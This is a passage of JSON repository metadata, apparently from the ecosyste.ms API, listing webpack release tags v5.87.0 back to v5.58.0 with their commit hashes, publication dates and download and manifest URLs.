ck/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp